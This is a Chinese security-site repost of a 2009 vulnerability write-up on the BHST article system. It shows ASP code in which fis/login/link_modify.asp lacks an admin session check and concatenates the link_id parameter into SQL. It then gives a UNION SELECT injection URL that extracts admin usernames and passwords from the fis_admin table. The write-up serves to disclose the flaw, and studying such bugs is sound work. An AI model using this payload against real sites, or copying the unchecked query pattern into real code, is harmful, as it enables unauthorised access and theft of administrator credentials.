为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

BHST文章系统漏洞

2009-6-23 11:00| 投稿: security

摘要:   作者:Jshell   Blog:http://www.jshell.cn   发布于鸡拔毛IT潮人社区   http://www.jbmao.com   首先说下作者在程序中代码的顺序错...
  作者:Jshell   Blog:http://www.jshell.cn   发布于鸡拔毛IT潮人社区   http://www.jbmao.com   首先说下作者在程序中代码的顺序错误   <!--#include file="../conn.asp"-->   <%   if session("adminuser")="" then   response.Redirect("login.asp")   end if   %>   <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">   <html xmlns="http://www.w3.org/1999/xhtml">   <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>   这样一句好像是多此一举 而且位置放错了 程序使用的是vbscript 默认的   不要这句的 而且这句只能放在代码的最顶端吧   漏洞出现在 fis/login/link_modify.asp 里 看了下后台文件 大都有   session的验证 唯独这里没有 再看下代码:   <%   linkid=request("link_id")   if linkid<>"" then   set linkrs=server.CreateObject("adodb.recordset")   sqllink="select * from fis_links where link_id="& linkid   linkrs.open sqllink,conn,1,3   %>   典型的不能再典型的注入了 打开表 link_id 数了下一共6个字段 在页面上有   字段内容的rs输出 所以我们使用联合查询直接爆喽   http://127.0.0.1/fis/login/link_ ... 0union%20select%201,admin_name,admin_pass,4,5,6%20from%20fis_admin   如下图:   

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部